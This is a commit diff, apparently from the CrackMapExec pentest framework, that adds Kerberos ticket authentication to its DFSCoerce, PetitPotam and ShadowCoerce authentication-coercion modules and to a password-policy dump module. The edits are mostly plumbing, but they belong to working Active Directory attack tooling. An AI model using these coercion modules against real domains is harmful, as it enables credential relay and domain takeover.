Fix ccache kerberos auth using rpc
lefayjey
mpgn
parent
3b5d719d24
commit
5f5884785f
|
|
@ -24,7 +24,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
trigger = TriggerAuth()
|
||||
dce = trigger.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host)
|
||||
dce = trigger.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
|
||||
if dce is not None:
|
||||
logging.debug("Target is vulnerable to DFSCoerce")
|
||||
|
|
@ -78,13 +78,13 @@ class NetrDfsAddRootResponse(NDRCALL):
|
|||
)
|
||||
|
||||
class TriggerAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost):
|
||||
rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\PIPE\netdfs]' % target)
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
|
||||
|
||||
#if doKerberos:
|
||||
# rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
#if target:
|
||||
# rpctransport.setRemoteHost(target)
|
||||
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ from impacket import system_errors
|
|||
from impacket.dcerpc.v5 import transport
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
||||
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
|
||||
class CMEModule:
|
||||
|
|
@ -35,7 +35,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
plop = CoerceAuth()
|
||||
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host)
|
||||
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
if plop.EfsRpcOpenFileRaw(dce, self.listener):
|
||||
context.log.highlight("VULNERABLE")
|
||||
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
|
||||
|
|
@ -158,7 +158,7 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
|
|||
)
|
||||
|
||||
class CoerceAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
|
||||
binding_params = {
|
||||
'lsarpc': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
|
||||
|
|
@ -191,6 +191,11 @@ class CoerceAuth():
|
|||
dce = rpctransport.get_dce_rpc()
|
||||
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||
|
||||
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||
try:
|
||||
dce.connect()
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ from impacket.dcerpc.v5.ndr import NDRCALL
|
|||
from impacket.dcerpc.v5.dtypes import BOOL, LONG, WSTR, LPWSTR
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
|
||||
|
||||
class CMEModule:
|
||||
|
||||
|
|
@ -34,7 +34,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
c = CoerceAuth()
|
||||
dce = c.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe="FssagentRpc")
|
||||
dce = c.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe="FssagentRpc", doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
|
||||
# If pipe not available, try again. "TL;DR: run the command twice if it doesn't work." - @Shutdown
|
||||
if dce == 1:
|
||||
|
|
@ -127,7 +127,7 @@ OPNUMS = {
|
|||
}
|
||||
|
||||
class CoerceAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost):
|
||||
binding_params = {
|
||||
'FssagentRpc': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\FssagentRpc]' % target,
|
||||
|
|
@ -143,6 +143,11 @@ class CoerceAuth():
|
|||
dce.set_credentials(*rpctransport.get_credentials())
|
||||
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||
|
||||
logging.debug("Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||
|
||||
try:
|
||||
|
|
|
|||
|
|
@ -84,7 +84,7 @@ class PassPolDump:
|
|||
self.lmhash = ''
|
||||
self.nthash = ''
|
||||
self.aesKey = None
|
||||
self.doKerberos = False
|
||||
self.doKerberos = connection.kerberos
|
||||
self.protocols = PassPolDump.KNOWN_PROTOCOLS.keys()
|
||||
self.pass_pol = {}
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue